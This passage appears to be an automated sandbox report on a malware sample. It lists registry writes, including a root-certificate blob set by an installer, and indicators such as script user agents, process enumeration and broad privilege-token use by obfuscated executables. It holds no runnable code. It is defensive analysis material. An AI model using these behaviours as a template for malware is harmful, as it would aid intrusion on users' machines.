\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Clients = 3a0000000000 msiexec.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{U9IGI0Q2-B7HR-SAI9-Z61V-J0SY8EIASHJB}\7289246C77593EBF svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage\ProcessingFlag = d04eb7a840cbd701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersio = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "395205405" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 046fb88140cbd701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\expensivesurvey.online\Total = "984" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\expensivesurvey.online\ = "143" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\expensivesurvey.online\Total = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\AdvertiseFlags = "388" msiexec.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\expensivesurvey.online\ = "47" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdge.exe -
Processes:
installer.exeCalculator.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 Calculator.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 Calculator.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Script User-Agent 7 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 37 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 87 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 598 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 603 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 705 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 720 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 722 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exeWed09b2a8bc4f16cb.exeExplorer.EXEWerFault.exeWed09d27135e5a8b3b.tmppid Process 1428 powershell.exe 1428 powershell.exe 2988 powershell.exe 2988 powershell.exe 2988 powershell.exe 1428 powershell.exe 3908 Wed09b2a8bc4f16cb.exe 3908 Wed09b2a8bc4f16cb.exe 2988 powershell.exe 2988 powershell.exe 1428 powershell.exe 1428 powershell.exe 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 5116 WerFault.exe 5116 WerFault.exe 5116 WerFault.exe 5116 WerFault.exe 5116 WerFault.exe 5116 WerFault.exe 5116 WerFault.exe 5116 WerFault.exe 5116 WerFault.exe 5116 WerFault.exe 5116 WerFault.exe 5116 WerFault.exe 5116 WerFault.exe 5116 WerFault.exe 5116 WerFault.exe 5116 WerFault.exe 5116 WerFault.exe 5116 WerFault.exe 5116 WerFault.exe 5116 WerFault.exe 5116 WerFault.exe 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 4216 Wed09d27135e5a8b3b.tmp 4216 Wed09d27135e5a8b3b.tmp 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 5116 WerFault.exe 5116 WerFault.exe 5116 WerFault.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid Process 3032 Explorer.EXE -
Suspicious behavior: MapViewOfSection 30 IoCs
Processes:
Wed09b2a8bc4f16cb.execk_6NCtiU3bUjW3jzeMQBw0u.exeWpFILx0yw_EK8MsdJAiKhmLH.execk_6NCtiU3bUjW3jzeMQBw0u.exe0hp5lI2f2FoyQfBIrXA9ES2X.exemstsc.exeA8A6.exeC71D.exeMicrosoftEdgeCP.exeSG5COJhctDghfNe0iIIPrpP1.exeMicrosoftEdgeCP.exepid Process 3908 Wed09b2a8bc4f16cb.exe 6608 ck_6NCtiU3bUjW3jzeMQBw0u.exe 1048 WpFILx0yw_EK8MsdJAiKhmLH.exe 4736 ck_6NCtiU3bUjW3jzeMQBw0u.exe 6608 ck_6NCtiU3bUjW3jzeMQBw0u.exe 6608 ck_6NCtiU3bUjW3jzeMQBw0u.exe 1048 WpFILx0yw_EK8MsdJAiKhmLH.exe 4736 ck_6NCtiU3bUjW3jzeMQBw0u.exe 4736 ck_6NCtiU3bUjW3jzeMQBw0u.exe 1048 WpFILx0yw_EK8MsdJAiKhmLH.exe 1048 WpFILx0yw_EK8MsdJAiKhmLH.exe 4056 0hp5lI2f2FoyQfBIrXA9ES2X.exe 6320 mstsc.exe 6320 mstsc.exe 5000 A8A6.exe 5912 C71D.exe 3900 MicrosoftEdgeCP.exe 8120 SG5COJhctDghfNe0iIIPrpP1.exe 6320 mstsc.exe 6320 mstsc.exe 992 MicrosoftEdgeCP.exe 992 MicrosoftEdgeCP.exe 992 MicrosoftEdgeCP.exe 992 MicrosoftEdgeCP.exe 992 MicrosoftEdgeCP.exe 992 MicrosoftEdgeCP.exe 992 MicrosoftEdgeCP.exe 992 MicrosoftEdgeCP.exe 992 MicrosoftEdgeCP.exe 992 MicrosoftEdgeCP.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
Processes:
4437894.exepid Process 1228 4437894.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Wed096a1bff61.exeWed09b3a5ca1a712d390.exepowershell.exepowershell.exeWed09db0d52c38.exeBCleanSoft82.exe4.exe5.exe10.exeWerFault.exeExplorer.EXEdescription pid Process Token: SeDebugPrivilege 2392 Wed096a1bff61.exe Token: SeDebugPrivilege 2492 Wed09b3a5ca1a712d390.exe Token: SeDebugPrivilege 1428 powershell.exe Token: SeDebugPrivilege 2988 powershell.exe Token: SeCreateTokenPrivilege 3652 Wed09db0d52c38.exe Token: SeAssignPrimaryTokenPrivilege 3652 Wed09db0d52c38.exe Token: SeLockMemoryPrivilege 3652 Wed09db0d52c38.exe Token: SeIncreaseQuotaPrivilege 3652 Wed09db0d52c38.exe Token: SeMachineAccountPrivilege 3652 Wed09db0d52c38.exe Token: SeTcbPrivilege 3652 Wed09db0d52c38.exe Token: SeSecurityPrivilege 3652 Wed09db0d52c38.exe Token: SeTakeOwnershipPrivilege 3652 Wed09db0d52c38.exe Token: SeLoadDriverPrivilege 3652 Wed09db0d52c38.exe Token: SeSystemProfilePrivilege 3652 Wed09db0d52c38.exe Token: SeSystemtimePrivilege 3652 Wed09db0d52c38.exe Token: SeProfSingleProcessPrivilege 3652 Wed09db0d52c38.exe Token: SeIncBasePriorityPrivilege 3652 Wed09db0d52c38.exe Token: SeCreatePagefilePrivilege 3652 Wed09db0d52c38.exe Token: SeCreatePermanentPrivilege 3652 Wed09db0d52c38.exe Token: SeBackupPrivilege 3652 Wed09db0d52c38.exe Token: SeRestorePrivilege 3652 Wed09db0d52c38.exe Token: SeShutdownPrivilege 3652 Wed09db0d52c38.exe Token: SeDebugPrivilege 3652 Wed09db0d52c38.exe Token: SeAuditPrivilege 3652 Wed09db0d52c38.exe Token: SeSystemEnvironmentPrivilege 3652 Wed09db0d52c38.exe Token: SeChangeNotifyPrivilege 3652 Wed09db0d52c38.exe Token: SeRemoteShutdownPrivilege 3652 Wed09db0d52c38.exe Token: SeUndockPrivilege 3652 Wed09db0d52c38.exe Token: SeSyncAgentPrivilege 3652 Wed09db0d52c38.exe Token: SeEnableDelegationPrivilege 3652 Wed09db0d52c38.exe Token: SeManageVolumePrivilege 3652 Wed09db0d52c38.exe Token: SeImpersonatePrivilege 3652 Wed09db0d52c38.exe Token: SeCreateGlobalPrivilege 3652 Wed09db0d52c38.exe Token: 31 3652 Wed09db0d52c38.exe Token: 32 3652 Wed09db0d52c38.exe Token: 33 3652 Wed09db0d52c38.exe Token: 34 3652 Wed09db0d52c38.exe Token: 35 3652 Wed09db0d52c38.exe Token: SeDebugPrivilege 4108 BCleanSoft82.exe Token: SeDebugPrivilege 4424 4.exe Token: SeDebugPrivilege 4588 5.exe Token: SeDebugPrivilege 4172 10.exe Token: SeRestorePrivilege 5116 WerFault.exe Token: SeBackupPrivilege 5116 WerFault.exe Token: SeDebugPrivilege 5116 WerFault.exe Token: SeShutdownPrivilege 3032 Explorer.EXE Token: SeCreatePagefilePrivilege 3032 Explorer.EXE Token: SeShutdownPrivilege 3032 Explorer.EXE Token: SeCreatePagefilePrivilege 3032 Explorer.EXE Token: SeShutdownPrivilege 3032 Explorer.EXE Token: SeCreatePagefilePrivilege 3032 Explorer.EXE Token: SeShutdownPrivilege 3032 Explorer.EXE Token: SeCreatePagefilePrivilege 3032 Explorer.EXE Token: SeShutdownPrivilege 3032 Explorer.EXE Token: SeCreatePagefilePrivilege 3032 Explorer.EXE Token: SeShutdownPrivilege 3032 Explorer.EXE Token: SeCreatePagefilePrivilege 3032 Explorer.EXE Token: SeShutdownPrivilege 3032 Explorer.EXE Token: SeCreatePagefilePrivilege 3032 Explorer.EXE Token: SeShutdownPrivilege 3032 Explorer.EXE Token: SeCreatePagefilePrivilege 3032 Explorer.EXE Token: SeShutdownPrivilege 3032 Explorer.EXE Token: SeCreatePagefilePrivilege 3032 Explorer.EXE Token: SeShutdownPrivilege 3032 Explorer.EXE -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
Wed09e95ff6b5.exeWed09d27135e5a8b3b.tmprun2.exeExplorer.EXEpid Process 1508 Wed09e95ff6b5.exe 1508 Wed09e95ff6b5.exe 1508 Wed09e95ff6b5.exe 1508 Wed09e95ff6b5.exe 1508 Wed09e95ff6b5.exe 1508 Wed09e95ff6b5.exe 1508 Wed09e95ff6b5.exe 1508 Wed09e95ff6b5.exe 1508 Wed09e95ff6b5.exe 1508 Wed09e95ff6b5.exe 1508 Wed09e95ff6b5.exe 1508 Wed09e95ff6b5.exe 1508 Wed09e95ff6b5.exe 1508 Wed09e95ff6b5.exe 1508 Wed09e95ff6b5.exe 4216 Wed09d27135e5a8b3b.tmp 1508 Wed09e95ff6b5.exe 1508 Wed09e95ff6b5.exe 1696 run2.exe 3032 Explorer.EXE 3032 Explorer.EXE 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 1696 run2.exe 